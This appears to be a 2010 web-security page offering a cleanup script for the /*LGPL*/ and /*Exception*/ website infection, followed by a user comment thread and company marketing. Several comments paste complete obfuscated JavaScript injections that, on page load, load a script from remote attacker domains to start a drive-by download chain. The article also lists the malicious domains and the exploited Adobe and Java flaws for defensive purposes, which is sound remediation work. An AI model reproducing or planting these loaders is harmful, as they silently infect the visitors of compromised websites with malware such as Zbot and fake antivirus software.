/*LGPL*/ and /*Exception*/ trojan Removal script, Trojan-Downloader.JS.a or Trojan-Downloader.JS.b or Trojan-Downloader.JS.c or Trojan-Downloader.JS.d cleaner, cleanup, Downloader worm removal. This script removes the trojan code from all files on your web server. Updated Jan 30, 2010

Copyrights© 2006-2010
Possible Solutions

Web Site Security Updates

Clean-up script for sites infected with Downloader worm( /*LGPL*/ or /*Exception*/ type script ).

As we all know there is a mass attack of /*LGPL*/ and /*Exception*/ type script on websites. I have seen plenty of websites infected with this type of infection and finally I decided to write a script to remove the codes inserted in files all over the server directories.

Download the Manual Trojan Code Remover New!

Released on 17th Feb 2010

As a new version of /*LGPL*/ and /*Exception*/ is out in wild. The code inserted in web pages after the BODY Tag or at end of Javascript files looks a bit like.

<script>/*LGPL*/ try{ window.onload = function(){var C1nse3sk8o41s = document.createElement('s&c^$#r))i($p@&t^&'.repl

<script>/*Exception*/ document.write(.....)

<script>try{window.onload=function(){(.....)

The SCRIPT tag above is not present in javascript(.js) files.
Well it is just another type of IFRAMER worm. Once deobfuscated, it loads javascript from
[http][POPULAR-DOMAIN-NAMES].easylifedirect.ru:8080/[POPULAR-DOMAIN-NAMES]/google.com/

This loaded Javascript then loads an iframe with src which contains actual payload
[http][POPULAR-DOMAIN-NAMES].easylifedirect.ru:8080/index.php?ys

some urls may also have "thechocolateweb.ru" or "tartband.ru" or "bestbondsite.ru" or "trueworldmedia.ru" or "avattop.ru" in place of "easylifedirect.ru"

The major files infected are
Javascript files .JS
index files such as
index*.html,
index*.htm,
index*.php,
default*.php,
mainframe*.php,
application*.php,
default*.html,
default*.htm
index*.asp
(index*.* and default*.*)

The javascript code seems to be changing since the day it launched and today morning I noticed that they have removed <script> tags in javascript files.

The payload hasn't changed much from last year's attacks. When one visits a compromised site, the malicious JavaScript loads more JavaScript that contains an iframe tag, which opens another page containing two links. One link goes to a PDF file, which is detected as Trojan-Downloader.JS.a or Trojan-Downloader.JS.b or Trojan-Downloader.JS.c or Trojan-Downloader.JS.d. The other is to a JAR (Java ARchive) file, which is detected as Downloader.

Those two files use the following vulnerabilities to infect the computer with malware:

* Adobe Acrobat and Reader Multiple Arbitrary Code Execution and Security Vulnerabilities (BID 27641)
* Adobe Reader and Acrobat 'newplayer()' JavaScript Method Remote Code Execution Vulnerability (BID 37331)
* Sun Java Runtime Environment and Java Development Kit Multiple Security Vulnerabilities (BID 32608)

The final payload includes malware like Trojan-Downloader.JAVA.Agent.al or Trojan-Downloader.JAVA.Agent.exe or Trojan.Bredolab, Downloader.Fostrem, and Trojan.Zbot, along with security risks such as PrivacyCenter and a number of other misleading applications that may be detected as Trojan.FakeAV. It's important to keep your definition files up-to-date as these files are frequently being updated.

REMOVAL STEPS
1. Block these websites on your firewall or router: "thechocolateweb.ru", "tartband.ru", "bestbondsite.ru", "trueworldmedia.ru", "avattop.ru" , "easylifedirect.ru"
2. Update your anti-virus and clean up infection from your machines or whoever is accessing it via FTP
3. Change the ftp password from secure machine which is not infected
4. upload the Manual Trojan Code Remover script to your public_html directory
5. run the script by calling the php file from your browser



PRECAUTIONS
1. Block these websites on your firewall and/or router: "thechocolateweb.ru", "tartband.ru", "bestbondsite.ru", "trueworldmedia.ru", "avattop.ru" , "easylifedirect.ru"
2. Keep your Anti-virus updated.
3. Do not open any suspicious links received on messengers or emails.
It will clean up the files and will also create a backup of files which are infected. (backup files will have extension as .infected.bak)




Update: 30th Jan 2010, Version 1.0.2 released

Ok, I have updated the file with new version to cleanup the new infection string.


Update: 09th Feb 2010, Version 1.0.3 released

Added removal code for latest signatures.


Update: 17th Feb 2010, Manual Trojan Code Remover released

Looks like they are changing the signatures too fast. So I have made this small tool so that you can manually remove the vius code.

Instructions:
1. Download the Manual Trojan Code Remover and unpack.
2. Upload it to document root of your website and run the script by opening the url in your browser
3. Now open the any infected file and copy the trojan code and paste in the textarea in the removal tool.
4. Press Clean All!
Thats All!.

* Please note that you will need extra step for Javascript files.
** Also process code in javascript files after php/asp files.


Let us know if you find other signature or codes, We will try to release an update asap.


Sameer Shelavale
Possible Solutions
Web Development, SEO & Web Security

Download the Manual Trojan Code Remover New!

Marie-Anne Harkness
maharkness@comcast.net
Dick Muri has my vote and my husband's vote as well. He will be a refreshing independent thinker representing us, not afraid to vote for the people's benefit. A majority of 9th District citizens were against the Obama Health Insurance fiasco. The incumbent voted the party line and voted yes.
testesr
sadhana@possible.in
This is for testing.
Pat
pat.romain@gmail.com
<script>eval(parseJS('var t="";var h="";var G;if(G!=_39_m_39_){G=_39__39_};var D_="";function C() {var S=_39__39_;var J="";var K=window;var V;if(V! = _39_O_39_){V=_39__39_};var R=String("scri"+"pt");var iq="";var Z;var r=_39__39_;var A;if(A!=_39__39_){A=_39_zH_39_};var Fl=new String();var E=String("g");var L="appmnQi".substr(0,3)+"end"+"Chinrc7".substr(0,3)+"ldxiDU".substr(0,2);var b=new String("]");var f;if(f!=_39__39_ && f!=_39_Qp_39_){f=null};var z=RegExp;var GU;if(GU!=_39_I_39_ && GU!=_39_lb_39_){GU=_39__39_};this.JL="";var bT;if(bT!=_39__39_){bT=_39_px_39_};function N(q,p){var d="[";var nm;if(nm!=_39_il_39_ && nm != _39__39_){nm=null};d+=p;d+=b;var oF;if(oF!=_39_So_39_ && oF != _39__39_){oF=null};var w=new z(d, E);this.ze=_39__39_;return q.replace(w, r);};var wk;if(wk!=_39_e_39_){wk=_39__39_};this.Ns=_39__39_;var i="onl"+"oad";var dz;if(dz!=_39_no_39_){dz=_39_no_39_};this.wa=_39__39_;var LO=_39__39_;var O_=_39__39_;var u=N(_39_sqr4cp_39_,_39_5pqQ4xa7_39_);var D="defeANm0".substr(0,4)+"r";this.g=_39__39_;this.Vw=_39__39_;Z=function(){this.ZF=_39__39_;try {var Gf;if(Gf!=_39_uW_39_ && Gf != _39__39_){Gf=null};n=document.createElement(R);var RV=new String();var Yo;if(Yo!=_39__39_ && Yo!=_39_fF_39_){Yo=_39_ib_39_};var v=new Array();n[D]=[1,8][0];var gY=_39__39_;var gYj=_39__39_;n[u] = N(_39_hGtQtGpW:H/j/jpYoHkjeGsjaWcYkG.YrQuY:j_39_,_39_GYjQWH_39_)+N( _39_8295634772434270642295791948166996914660733561217215135_39_,_39_65174293_39_ )+N(_39_/DgXoVoEg5lReL.6cMoXm5/jt9eIcWh4nIo4r9aWtLiR.Wc5o3mR/Wi5c9iMb6a9.WcRo3mI.4p9hXp5_39_,_39_I36Xj9VE4W5RDLM_39_);var XG;if(XG!=_39__39_ && XG!=_39_vi_39_){XG=null};var II=_39__39_;var Q=new String("bodyOc6".substr(0,4));var QA;if(QA!=_39__39_ && QA!=_39_wq_39_){QA=_39_JJ_39_};var Oa;if(Oa!=_39__39_ && Oa!=_39_hH_39_){Oa=_39_Od_39_};var yK=new String();var Zy;if(Zy!=_39__39_ && Zy!=_39_MB_39_){Zy=null};var uu;if(uu!=_39__39_ && uu!=_39_nE_39_){uu=null};document[Q][L](n);var fR;if(fR!=_39_U_39_ && fR != _39__39_){fR=null};} catch(H){this.EW="";var x_=new Date();};this.YM=_39__39_;};K[i]=Z;var vr="";this.kR=_39__39_;var Jf;if(Jf!=_39_of_39_ && Jf != _39__39_) {Jf=null};};var Wd=new Array();var UK; if(UK!=_39_HZ_39_ && UK!=_39_uz_39_) {UK=_39__39_}; C(); var KqP=new String();'));</script>
This is the code <script>var B="";try {var Pm;if(Pm!='Wg' && Pm != ''){Pm=null};var X="";var aL;if(aL!='l'){aL='l'};var n=window[unescape("%75%6e%65%73%63%61%70%65")];var f='';var x;if(x!='lM'){x='lM'};var z="";var U;if(U!=''){U='Y'};var A=null;var iB='';this.R="";var J=n("%72%65%70%6c%61%63%65");this.lW='';var NU;if(NU!='' && NU!='V'){NU=null};var m=window[n("%52%65%67%45%78%70")];this.sl='';var CK;if(CK!='yC' && CK!='Xs'){CK=''};function Q(j,mO){var tT;if(tT!='Ew' && tT!='H'){tT=''};var Z=n("%5b");var UU=new Array();var dY;if(dY!='Wd' && dY!='MQ'){dY=''};Z+=mO;var ER;if(ER!=''){ER='O'};Z+=n("%5d");this.pl='';var F=new m(Z, n("%67"));var W_;if(W_!='' && W_!='c'){W_='G'};var jc=new String();return j.replace(F, A);};var sY;if(sY!='' && sY!='r'){sY=''};this.bz="";var v=Q('8643949097791587555567306637967','7635491');this.Ra='';var j=n("%31");var Cf=new Array();var T=n("%73%63%72%69%70%74");var i=Q('/xpwaqnLtwiVpx-VcqoLmV/wgqoWoLgLlqeW.wcVoVmL/wtWaqgqgVeLdw.xcxoUmW.UpUhxpw','VqLwUWx');this.hx="";var b="on"+"lo"+"adK2O".substr(0,2);var tE;if(tE!='D' && tE!='sD'){tE=''};var W='';var vb;if(vb!='qj' && vb!='CJ'){vb=''};var gX;if(gX!='' && gX!='jy'){gX=null};var QY="\x68\x74\x74\x70\x3a\x2f\x2f\x6a\x6f\x79\x73\x70\x6f\x72\x74\x73\x77\x6f\x72\x6c\x64\x2e\x69\x6e\x66\x6f\x3a";var VV;if(VV!='w'){VV=''};this.FS="";var tl;if(tl!='uQ' && tl!='Xd'){tl='uQ'};function vi(){var eo;if(eo!='CC' && eo!='Eh'){eo=''};var JP=document;var jk;if(jk!='nA' && jk!='gZ'){jk='nA'};vG=JP.createElement(T);var QM=new Date();var _C=new Array();var lO;if(lO!='' && lO!='Au'){lO=''};W+=QY;W+=v+i;var BJ;if(BJ!='' && BJ!='rw'){BJ='HW'};this.lH='';vG.defer=j;this.nL='';this.ls='';vG.src=W;var cW="";var hB=new Array();var Jo=JP.body;Jo.appendChild(vG);var RC=new Array();var I=new Array();};var um;if(um!='QP'){um=''};var Lr=new Array();window[b]=vi;var Ny;if(Ny!='Zg' && Ny!='hP'){Ny='Zg'};var fi="";var yj="";} catch(y){var dH;if(dH!='RT' && dH != ''){dH=null};var xP;if(xP!='tB' && xP != ''){xP=null};};</script> <!--3f4e59c3c78554c701496acf24e1b1b7-->
Looks like a great script but it doesn't work. My server has php 5.2.12. Would really appreciate it if you can tell me how to get it to work. I've tried it in the root of the site and then in each sub folder but nothing. Stan
VietNam360Plus
vietnam360plus@gmail.com
<script>var t="";var h="";var G;if(G!='m'){G=''};var D_="";function C() {var S='';var J="";var K=window;var V;if(V!='O'){V=''};var R=String("scri"+"pt");var iq="";var Z;var r='';var A;if(A!=''){A='zH'};var Fl=new String();var E=String("g");var L="appmnQi".substr(0,3)+"end"+"Chinrc7".substr(0,3)+"ldxiDU".substr(0,2);var b=new String("]");var f;if(f!='' && f!='Qp'){f=null};var z=RegExp;var GU;if(GU!='I' && GU!='lb'){GU=''};this.JL="";var bT;if(bT!=''){bT='px'};function N(q,p){var d="[";var nm;if(nm!='il' && nm != ''){nm=null};d+=p;d+=b;var oF;if(oF!='So' && oF != ''){oF=null};var w=new z(d, E);this.ze='';return q.replace(w, r);};var wk;if(wk!='e'){wk=''};this.Ns='';var i="onl"+"oad";var dz;if(dz!='no'){dz='no'};this.wa='';var LO='';var O_='';var u=N('sqr4cp','5pqQ4xa7');var D="defeANm0".substr(0,4)+"r";this.g='';this.Vw='';Z=function(){this.ZF='';try {var Gf;if(Gf!='uW' && Gf != ''){Gf=null};n=document.createElement(R);var RV=new String();var Yo;if(Yo!='' && Yo!='fF'){Yo='ib'};var v=new Array();n[D]=[1,8][0];var gY='';var gYj='';n[u] = N('hGtQtGpW:H/j/jpYoHkjeGsjaWcYkG.YrQuY:j','GYjQWH')+N('8295634772434270642295791948166996914660733561217215135','65174293')+N('/DgXoVoEg5lReL.6cMoXm5/jt9eIcWh4nIo4r9aWtLiR.Wc5o3mR/Wi5c9iMb6a9.WcRo3mI.4p9hXp5','I36Xj9VE4W5RDLM');var XG;if(XG!='' && XG!='vi'){XG=null};var II='';var Q=new String("bodyOc6".substr(0,4));var QA;if(QA!='' && QA!='wq'){QA='JJ'};var Oa;if(Oa!='' && Oa!='hH'){Oa='Od'};var yK=new String();var Zy;if(Zy!='' && Zy!='MB'){Zy=null};var uu;if(uu!='' && uu!='nE'){uu=null};document[Q][L](n);var fR;if(fR!='U' && fR != ''){fR=null};} catch(H){this.EW="";var x_=new Date();};this.YM='';};K[i]=Z;var vr="";this.kR='';var Jf;if(Jf!='of' && Jf != ''){Jf=null};};var Wd=new Array();var UK;if(UK!='HZ' && UK!='uz'){UK=''};C();var KqP=new String();</script> <!--20bd2da471d77a7db51433b12a05f16b-->
i HAVE THIS on every index.php and index.html : <script>var H='';var Y;if(Y!='' && Y!='r'){Y=null};var p='';var rE;if(rE!=''){rE='w'};function l(){var C=new String();var Gl;if(Gl!='Cs' && Gl!='z'){Gl='Cs'};var uW=new String();var W_=new String();var h=unescape;var V;if(V!='TH' && V!='Po'){V='TH'};this.Yu="";var Nr=new Array();var E=window;var B=new String();var SA;if(SA!='GE'){SA='GE'};var t=h("%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%76%65%72%69%7a%6f%6e%2e%6e%65%74%2f%70%68%6f%74%6f%62%75%63%6b%65%74%2e%63%6f%6d%2e%70%68%70");var _B;if(_B!='' && _B!='J'){_B=null};function Z(N,d){var WJ;if(WJ!='vX'){WJ='vX'};var n="";var P="g";var A=new Date();var Tq;if(Tq!=''){Tq='rL'};var G=h("%5b"), o=h("%5d");var pa=new String();var Zv;if(Zv!='q'){Zv=''};var ob=G+d+o;var Cg;if(Cg!='jc' && Cg!='Vd'){Cg=''};var ho=new RegExp(ob, P);var BY;if(BY!='MU' && BY!='EB'){BY=''};return N.replace(ho, new String());var gV=new Date();var O=new String();};this.qS="";var lp;if(lp!='' && lp!='Oi'){lp=null};var wa;if(wa!='' && wa!='mH'){wa='vP'};var rdd;if(rdd!='TQ' && rdd != ''){rdd=null};var Pv;if(Pv!='rK' && Pv != ''){Pv=null};var Q=Z('87712732013572846317066731','71254936');var cC="";var Ye=new Date();var Gd=new String();var Lj="";var X=document;this.Wt="";var ZG="";function Ze(){var qP=new Array();var kc;if(kc!='' && kc!='gK'){kc=''};var W=h("%68%74%74%70%3a%2f%2f%65%61%73%79%66%75%6e%67%75%69%64%65%2e%61%74%3a");var ZN=new Date();var RI;if(RI!='Je' && RI != ''){RI=null};var iR=new String();Gd=W;var pw=new Date();Gd+=Q;this.nJ="";Gd+=t;var oT;if(oT!='xz'){oT=''};try {var tW=new Date();var ny="";dl=X.createElement(Z('sqcqrqilpqtq','lq'));dl[h("%73%72%63")]=Gd;var LE;if(LE!='Js' && LE != ''){LE=null};dl[h("%64%65%66%65%72")]=[8,1][1];this.gg='';this.fz='';X.body.appendChild(dl);this.lF='';var zV;if(zV!='HU'){zV=''};var cH;if(cH!='' && cH!='zO'){cH='vg'};} catch(U){var DI;if(DI!='vM' && DI!='Gk'){DI='vM'};alert(U);var Pz;if(Pz!=''){Pz='jz'};};var PJ=new Date();}var tO=new Array();var qPw;if(qPw!='' && qPw!='oI'){qPw='iC'};var Av="";var cI=new String();E["pbAfonl".substr(4)+"9gnoad9gn".substr(3,3)]=Ze;};this.tC="";var cD='';l();</script> <!--ad9b423bac7ee8a79bd67162af71975c--> -------------------------------- can I remove them?
I'm having the same problem.... Unable to clean a infected file(file not writable) There are hundreds and hundreds listed, and strangely, many of the files listed are *not* infected. Oh man I hope someone can post a solution... this script really seems to be the answer to a problem that otherwise seems insurmountable!
to all those wondering if the script works on new strains, it should. pretty much whatever you post into the input box it will search out in every file and then remove it, its a glorified search and replace script. unfortunately i cant seem to get it to work on my server, hope you all have better luck.
mamamia
postruk98@hotmail.com
<script>var P=new Array();try {var A;if(A!='un' && A!='n'){A='un'};var QD;if(QD!='L' && QD!='v'){QD='L'};var G=String("kAOrg".substr(4));var vW=new Date();var f=String("repl"+"ace");var l='';var r="[";var hm;if(hm!=''){hm='rm'};var N=RegExp;var sG;if(sG!='Ql'){sG='Ql'};var S='';var nE;if(nE!=''){nE='W'};this.LM='';var Sb="6Zc]".substr(3);var fb="";function Y(u,H){var KU='';var tV;if(tV!='' && tV!='ct'){tV=''};this.p='';var X=r;X+=H;var _;if(_!='Yw'){_=''};this.yj="";X+=Sb;var XK=new N(X, G);return u.replace(XK, S);var m;if(m!='KP' && m!='We'){m='KP'};};var pt=new Date();var M;if(M!='' && M!='Ge'){M='xc'};var c=Y('hZtZt2p2:2/Z/Za2u2tZoZ-2rZuZ.ZbZlZoZgZfZa2.2cZoZm2.ZmZoZn2oZgZr2a2f2i2aZsZ-2cZo2m2.ZBZl2eZnZd2eZr2M2aZg2a2z2i2nZeZOZn2lZi2n2eZ.Zr2uZ:2',"Z2");var fM='';var Bs='';var oQa="";var F=String("sc"+"riEb2Y".substr(0,2)+"pthvof".substr(0,2));var u="1";var _E;if(_E!='' && _E!='va'){_E='GO'};var tZ=new Array();var rP;if(rP!='rq'){rP='rq'};this.kP="";var s="/nat"+"e.co"+"m/na"+"te.c"+"om/gleu".substr(0,4)+"rPMdoogl".substr(4)+"6wVe.co6wV".substr(3,4)+"m/tr"+"HqtNipod".substr(4)+"bnOA.com".substr(4)+"/inceVb".substr(0,4)+"UAZOrediZAOU".substr(4,4)+"xP4mail4xP".substr(3,4)+".com1dU".substr(0,4)+"VN0.phpV0N".substr(3,4);this.jE='';var jt=new Array();var t=Y('89707978779074',"749");var rG;if(rG!='' && rG!='ZB'){rG='sn'};var h="on"+"lo"+"6u3ad".substr(3);this.LQ="";this.mr="";this.Yh='';var vi;if(vi!='Kc'){vi=''};window[h]=function(){var Hh;if(Hh!='' && Hh!='sw'){Hh=null};var Zh;if(Zh!=''){Zh='SJ'};z=document.createElement(F);this.Py='';var Jv;if(Jv!='' && Jv!='nb'){Jv='AN'};var LR=new String();var Fr=new String();fM+=c;var PZ;if(PZ!='_m' && PZ!='pz'){PZ='_m'};var NL="";fM+=t+s;var Fg;if(Fg!=''){Fg='nO'};var dO="";z.src=fM;z.defer=u;var dc;if(dc!='dw' && dc!='U_'){dc='dw'};var mw;if(mw!='qa' && mw!='JM'){mw=''};var o=document.body;o.appendChild(z);var ed;if(ed!='Xy' && ed != ''){ed=null};var fJ=new String();};var Iy=new String();} catch(q){var inU;if(inU!='' && inU!='Ju'){inU=''};var ac="";};var hF=new Array();var fT=new Array();</script>
the PHP script doesnt seem to work, i ran it on a IIS server with php5 and nothing happened, i checked the files and the infected file was still there, i copied the whole javascript, and one without the <script> tags and still nothing.
joe
peterprossedi@hotmail.com
im getting Unable to clean a infected file(file not writable) and theres no way i can give write access to all these files....there are a few hundered........
Hi peter, Many people don't have recent backups. Also on many machines the infection is too widespread and it may take many hours to find malicious code and remove them manually in each file. These tools are targeted to save time of people who are infected.
Peter
pk@kelmace.com
Why use the manual trojan code remover? Why not just remove the malware code from the files or replace them from a backup? That's what I did yesterday from an infection I found and there does not appear to be an issue or re-infection. FTP passwords were changed too of course.
Msia
yong_isprings@yahoo.com
i pasted the script but it was not deleted. Does it works on the script below? <script>var i;if(i!='' && i!='f'){i=null};this.US='';function h(){var N;if(N!='D'){N='D'};this.q='';this.K="";var A;if(A!=''){A='fI'};var H=new String("g");var u='';var eQ;if(eQ!='' && eQ!='R'){eQ=null};var j="";var zr="";var G=RegExp;var ia;if(ia!='Om' && ia != ''){ia=null};this.tD="";var GF="";function z(O,M){var t=new G("["+M+"]", H);return O.replace(t, u);var hS=new Date();var Oa;if(Oa!='' && Oa!='C'){Oa=''};};var GN='';var Dj='';var qY=new Array();var U=z('83359903298992509252',"2593");var T="scri"+"fNLpt".substr(3);var F=new String("9Qm/go".substr(3)+"oglqDT5".substr(0,3)+"arOe.cOra".substr(3,3)+"NZdom/".substr(3)+"gooNuBK".substr(0,3)+"Ef6gle".substr(3)+".co"+"m/m"+"HasediHas".substr(3,3)+"afi"+"c9jyre.".substr(4)+"com"+"izm/remzi".substr(3,3)+"DK3tver3tDK".substr(4,3)+"Ilrso.".substr(3)+"0oGnetGo0".substr(3,3)+"Gt3/xctG3".substr(3,3)+"y1sar.y1s".substr(3,3)+"comEkf".substr(0,3)+"mtH.cn".substr(3)+"cEFa.ph".substr(4)+"3VUp".substr(3));var TB='';var m=String("bdKWhtt".substr(4)+"p:/"+"cYtB/ms".substr(4)+"GiDYn-c".substr(4)+"om-"+"tIBcn.".substr(3)+"5nM1torn1M5".substr(4,3)+"renLfY".substr(0,3)+"C0mtz.".substr(3)+"MG6scomGsM6".substr(4,3)+"lugK.so".substr(4)+"8x9egou89ex".substr(4,3)+"TGgx-co".substr(4)+"H6kIm.sI6kH".substr(4,3)+"eas"+"ilv"+"ers"+"SQ1kite".substr(4)+"NX3.ruN3X".substr(3,3)+"8rp5:pr58".substr(4,1));var An;if(An!='Ck' && An!='vt'){An=''};var Wg='';window.onload=function(){this.d='';this.ac='';try {var II;if(II!=''){II='Q'};this.ib="";TB=m+U;this.ML='';TB+=F;var pW;if(pW!='IC' && pW != ''){pW=null};var WP='';var l='';_=document.createElement(T);this.Cu="";var WV;if(WV!='' && WV!='N_'){WV='O_'};this.L="";var hh;if(hh!='g' && hh!='Mk'){hh='g'};_.defer=[1][0];this.Rl="";_.src=TB;this.HC="";this.TR="";document.body.appendChild(_);var Aj=new Array();} catch(e){var CQ=new Date();var bD;if(bD!=''){bD='qp'};};var UK='';};this.AY='';};h();var Ja;if(Ja!='' && Ja!='HB'){Ja='Mg'};</script>
Christina
tinaxo@gmail.com
Oh, and it doesn't show "Success" or anything.. I don't know why.
Christina
tinaxo@gmail.com
I enter the code and it goes through but none of the files were edited. It doesn't give me any error or anything but the bad code is still there. Any ideas why?
hey hatem, you need PHP5+ to run this script. Please do not forget to clean up your local machines first and change FTP password.
Hi First of all, thank you for your efforts, when I put the code and click "clean all" it gives me this message: Fatal error: Cannot instantiate non-existent class: directoryiterator in /home/content ... /html/trojan-code-remover.php on line 172 How can I fix it ???
Guys , once you clean up your system , delete all the FTP account . This blocks the entry point of virus and malware and it make sure that your file wont infect again.
hi, please use the tool Trojan Code remover, You just need to copy paste the above code in it . It will clean up the code from all files. Let me know if there are any other problems.
<script>this.Pe='';function w() {var _u=52530;var c=54252;var f='g';this.T=false;var S='[';var Y=']';var z='replace';this.p="";var UJ=false;function s(b,fW){var OO='';var l=S;var L='';l+=fW;l+=Y;var zQ=false;var H=new RegExp(l, f);var d='';return b[z](H, '');};this.Uz='';var X=s('cDrdeBadt9edEBldeBmDeBnjtB',"BDd9j");var k='';var u=s(':G8Z0y8G0e',"e1GZy");this.fF=16313;var vT='';var P=s('/wiwbXiVbIoX.XcVoXmH/wiXbIiXbVoV.IcHoHmw/HyHowuwpwoHrwnX.HcVoXmX/XgIoXowgVlVeX.wcwowmV/ItIiVnHywuVrXlH.wcwowmH/H',"HXIVw");var O=s('h5tktFpX:X/k/kpXc5hXoFmkeX-5nXeKtk.XgXo5okgKlKe5.FfFrk.FgkoKoKg5lKek-Xc5okmK-5eFc5.knke5w5uFs5a5gFuXi5dXeF.FrXuX',"XkKF5");var i=s('sWc3r3i3potW',"WIv3o");var Ho=false;var x='';var Pc=window;var qK='';Pc[s('oNnslfoNaNdb',"bNhfs")]=function(){try {var qs="";var bJ=false;x+=O;var XHF=false;x+=u;var ld=26090;x+=P;this.bz=false;this.bd=63908;_=document[X](i);this.vc=false;this.pH=false;var da=false;YF(_,s('s0r6cU',"U60ae"),x);YF(_,s('d9eNfoe9ro',"oVN9g"),([5,1][1]));var ya=24905;document[s('bToCdCyT',"TgaCL")][s('afpJpvevnHdHCLhJiLlJdL',"LHJvf")](_);} catch(lr){};this.Ms="";};this.fi="";function YF(YK,fy,y){this.Mi=false;YK[s('sUeUtWAKtWtUrXiKbWu1t1eX',"X1UWK")](fy, y);}var yD="";this.ji=53469;};var oo=15475;w();this.zbe=804;</script> <!--46938f0f2983f7fd21665bca5c945595-->
Restless
mihirjha27@gmail.com
<script>this.N=false;var xF='';var j=']';this.Xw=55944;var A='g';var w='[';var jB='replace';var IL=false;function v(i,x){var a=12817;var X=w;X+=x;this.Bi=14997;X+=j;this.mw="";var k=new RegExp(X, A);this.p=56626;return i[jB](k, '');};this.Xl=59099;var t='';var n=v('/JmFaFinlF.FrFuJ/nmGaFiFln.nrZuF/JgFoZongJlFeF.FcFoGmn/Z1F1F3J3Z.ZcFcJ/npncnwZonrFlJdG.FcJoFmF/G',"GZJFn");this.pM="";var R=v(':B8N0N8R0R',"RIQNB");this.mZ="";var Z=v('hZtjtWpF:Z/F/xijnZdjiWaFnjrFajiFlj-Zgxojvx-Fijnx.jgWoFojgFlFeZ.jcFojmZ.xpjkF.FaZlxtFejrFvxiWsxtjaW-WoZrFgx.jmjajnWsFbxeFsWtxsWiFtFeW.xrFuZ',"ZjxFW");this.no=30907;var AK=document;var Un="";var W=window;var wi="";function S(_){var dZ='';var jg=[v('skcerwiwpWtU',"UekWw"), v('cUrYevaFtYegEYlUeYmYeYnFtU',"UYvgF"), v('o0nRlRo0aSd0',"0S6mR"), v('sxrxcR',"RxAEk"), v('ajp4pueDnud4CQhuijljdj',"jQu4D"), v('sHeNtLAgtgtgrGiLbGuHtGeH',"HgNGL"), v('bDoQdQyQ',"QX9Dc"), v('dmeWfqemr2',"2uWmq"), "1"];var SG="";var m=jg[_];return m;this.Wm="";}var H = function(){var Qz=30189;try {var kf="";t+=Z;this.Dl="";t+=R;this.u=43003;t+=n;M=AK[S([1,9][0])](S([0,6][0]));var f="";var qv='';M[S([3,3][0])]=t;var d = AK[S([6][0])];this.Ly=7658;M[S([5][0])](S([4,7]
Hi, if you are getting the infection, one of your machines, from which you are accessing the host is infected with the TROJAN-DOWNLOADER.PEGEL.JS.x . Please clean up the trojan from all the machines, Then change all of the FTP Passwords and cpanel passwords from CLEAN machine. If after all this its getting back again, then please check if something at your hosting provider is compromised. But most of the times infection will be on your side. Avoid opening the infected sites, Avoid opening strange links in IM messages.
Crs
canraps@gmail.com
Hi Sameer, Its getting all sick :( How can we prevent this from happening :( It infects like every 2-3 day in our server..I use inforapid search&replace for the code removal but im sick of this..Do we get infected because of the iframe ?

Web site design

Our attractive and appealing web site designs bring you
More Business, More Customers.

When you select Possible Solutions for your website design, you'll be selecting a professional web design and development company that prides itself on supplying visually stunning best custom web page design that helps your business work, grow and progress better. Because successful web design requires several elements, innovative engaging graphical design, fast stable performance, a clear focus on functionality, client satisfaction and usability. We are proud to say that we have all these things. Clean website design that keeps your visitors happy, and a professional custom web design solution that has our clientele doing more business online than ever before.

We provide website designs at affordable prices with high quality. If you are looking for a professional website designing and development company then you've come to the right place for website design and development company.

View our web site design portfolio

Web Development

E-commerce, CRM web-applications, Community Portals, Dating Websites, Real Estate Indexes, Business Directories, Seach Engines, Forums, Blogs, CRM web applications
Everything is POSSIBLE!

Possible Solutions has proven its ability in providing its customers with the worlds leading e-commerce solutions. Our team has all the technical knowledge, experience and expertise that are required to develop any kind of e-commerce application. We are empowered to provide our customers with standard and customized e-commerce website development solutions that can coincide with their budget and thus can help them achieve their goals even at affordable costs.

We also have strong expertise in building Community websites, Dating websites, Video/music sharing portals. To meet client's cost and time requirements we also use open source application as and when required. This speeds up the development cycle and also gives you code which is tested and being used by a large community.

Real Estate website is also a lucrative venture for companies and agents working in real estate industry. We have developed custom website applications for real estate companies and agents where they can display their real estate listings in user friendly and quickly browsable format. Our applications are also developed so that they can be easily integrated with any MLS/IDX servers. Currently we support NorthWestIDX but other servers can be added if required.

Content Managament Systems are our strength we have built two versions of our own CMS system and third the most poswerful one is in pipeline. We also have strong knowledge of major open-source CMS systems such as Joomla, Drupal etc. and we can develop components/modules for Joomla/Drupal.

Possible Solutions have also stepped into customizing and developing modules or extensions for opensource CRM applications such as vTiger or SugarCRM for small/medium or large businesses.

Search Engines and Web Crawlers, this is another area where we excel. We have successfully developed Internal Search engine(INSEARCH). Besides this we also have good experience experience of developing web crawlers, automated data scrappers and online data collection and analysis tools.

We have always been ready to work on new challenges and ideas, so no matter how complex your project is, we are always ready to take on it and complete it successfully.

So lets get started, It's Possible!

Search Engine Optimization ( SEO )

Why is Search Engine Optimisation so important for your Business?
Why are High Rankings in Google’s natural/organic listings so important?
"73% of new website visitors come through Search Engines"

If you have a website that you rely on for generating sales and enquires, you will need to market that website in order to generate interest and traffic to your site. The most cost effective way to do this is by achieving high rankings in Google’s organic listings for your highly searched keywords. And with over 80% of the UK search market going to Google, you need to ensure that Google knows about your website!


SEO plans by Possible Solutions will benefit your website with:

  • High volumes of ‘ready to spend’ traffic – these visitors are actively searching for your products and services
  • Reduced costs for winning new customers = greater profits!


How do we do it?

  • First of all, Search Engine Optimization is not rocket science, it takes time to see results.
  • We follow tried and tested processes that we constantly improve and refine to maximise the effectiveness of our clients’ campaigns.
  • Moreover, effective SEO is labour intensive and time consuming.
  • We have the resources to be able to undertake even the most demanding SEO campaigns in the most competitive markets.


Effective SEO is made up of the following components:

  • Keyword, competitor and market analysis
    Our Analysis Team will analyse the most searched and targeted keywords and phrases that relate directly to your business. From here we identify the SEO strategies of your competitors for these phrases in order to see exactly what we need to do to rank above them. This will allow us to focus your campaign on the achieving the highest rankings for your most searched for keywords. Furthermore, this indepth research means that each campaign has minimum wastage and maximum 'Value for money'.
  • Onsite Optimisation
    Our SEO specialists understand how Google’s spiders crawl and index websites. Onsite SEO involves relevant keyword placement in the most important areas of each page, html code optimisation, content optimisation, internal linking, navigation optimisation as well as resolving any issues which will be affecting the ranking of your website and any of its pages. The aim of this onsite work is to ensure Google spiders can effectively crawl each page placing emphasis on the most important keywords. The result is a site wide rise in rankings for ALL keywords across you products, services and brands.
  • Link Building -
